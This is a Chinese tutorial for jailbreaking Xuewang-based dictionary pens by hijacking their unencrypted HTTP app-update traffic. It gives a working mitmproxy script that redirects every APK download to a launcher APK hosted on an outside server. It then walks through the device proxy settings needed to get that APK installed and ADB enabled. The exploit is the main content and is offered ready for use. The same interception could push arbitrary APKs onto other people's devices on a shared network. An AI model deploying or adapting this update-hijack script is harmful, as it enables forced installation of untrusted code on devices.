本教程适用于已经更换为动态密码的学王词典笔食用,2025最新款实测有效
实测同学新买的p-900和p-800都能用,更新过的恢复出厂后也可用!
2026了,这个漏洞竟然还在…刚给同学破解了一根,该思路依旧可行
要求:
1.设置-关于界面里有JXW一项,证明这支词典笔/听力宝使用了学王的方案(我的jxw版本2025.8 已经屏蔽了之前所有的破解路径,甚至输入法的设置也被精简了)
2.连续点击型号无法进入开发者选项,点击序列号+版本号也不行
不要连续点击版本号!!!会进入产测模式(但进入设置的功能已经移除了),在进入原生之前无法关闭显示轨迹功能,影响使用
3.设置-更新-应用更新里有应用可更新
4.有一台电脑和基本的技术能力 并且电脑和词典笔使用同一个WIFI
原理: 学王部分OTA服务器使用不安全的http,容易被篡改
使用教程:
1.在电脑安装mitmproxy (不会的自行Bing一下)
2.保存以下脚本为mitm.py
from mitmproxy import http
# 本脚本会将设备下载HTTP协议的apk替换为兽耳桌面的apk,安装桌面后点打开,你就可以打开设置进而打开ADB了
def request(flow: http.HTTPFlow) -> None:
# 检查请求的URL是否匹配APK
if ".apk" in flow.request.pretty_url:
# 创建302重定向响应
flow.response = http.Response.make(
302, # 状态码
b"", # 响应体内容(空)
{
"Location": "http://x1.ydyspc.com/mimikko101.apk", # 重定向地址
"Content-Type": "application/vnd.android.package-archive" # 内容类型
}
)
3.使用mitmproxy -s mitm.py打开代理
4.在词典笔侧打开设置,先关闭WIFI然后退出去点击更新-系统更新,点击检查更新,提示没网,这里可以打开WIFI设置,点击它。先别激动,右上角搜索功能的索引被删除了,没有办法从这里进入其他设置(叹气)
接下来在界面打开WIFI,长按你的WIFI名,点击修改WIFI信息。点击高级设置,点击代理,改为手动。在底下输入电脑的IP地址(可以在电脑设置-网络里查到,应该是192开头的),端口8080,点保存
5.词典笔返回主页,点设置-更新,观察电脑上应该已经有输出了,点击应用更新-随便一个可以更新的应用右边的下载。可以观察到电脑上出现了一个302请求,这就是我们伪造的请求了。
6.下载完成后点安装,可以看到软件的名字已被修改,安装后不要退出点打开,进入兽耳桌面初始化。可以按照引导修改默认桌面,如果你想用自己的桌面就不改,如果想隐藏可以之后在设置改回学王
7.设置-关于设备,连续点击版本号,打开开发者选项,打开USB调试,电脑端ADB安装软件,接下来就可以按正常流程破解了~